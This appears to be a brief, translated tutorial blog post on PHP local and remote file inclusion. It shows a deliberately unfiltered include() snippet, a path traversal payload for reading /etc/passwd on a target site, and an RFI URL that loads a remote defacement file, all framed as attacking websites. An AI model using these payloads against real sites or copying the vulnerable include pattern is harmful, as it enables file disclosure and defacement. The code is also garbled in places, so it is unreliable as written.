Tutorial Regarding Local File Inclusion (LFI) And Remote File Inclusion (RFI)

Local file and Remote file tutorial

Okay, on this occasion I will briefly discuss Local File Inclusion and Remote File Inclusion.

In the previous article, I have also discussed a tutorial on Using LFI Bugs on the Website but it would be better if we discussed it in more detail.

Well, the first explanation regarding the functions that can cause LFI / RFI.

Code:

include ();

include_once ();

require ();

require_once ();

And with the conditions on the php configuration on the server:

allow_url_include = on

allow_url_fopen = on

magic_quotes_gpc = off

For example, suppose we have an index.php file with the content code like this,

<a href=”index.php?page=file1.php”> Files </a>

<? php

$ page = $ _GET [page];

include ($ page);

?>

If we look maybe the url address will look like this:

Code:

http://target.com/index.php?page=files.php then this script will display the files.php page

Well, here the attacker can exploit LFI because the page variable is included without using a filter.

Suppose the attacker wants to access the passwd file on the server, then he will try to enter the payload like this ../../../../../../etc/passwd.

With the number “../” depends on the depth of the index.php file folder, so the contents of the passwd file will be displayed in the browser. So we can also use the method of guessing the folder structure on the target website.

Okay, if we’ve found an LFI bug on the target website. Now we will try to find the RFI bug by adding a remote file link (from outside the website) in the page variable. Examples for example like this:

http://target.com/index.php?page=http://asu.com/test.txt

The file “test.txt” contains for example: “Hacked by YOURNAME”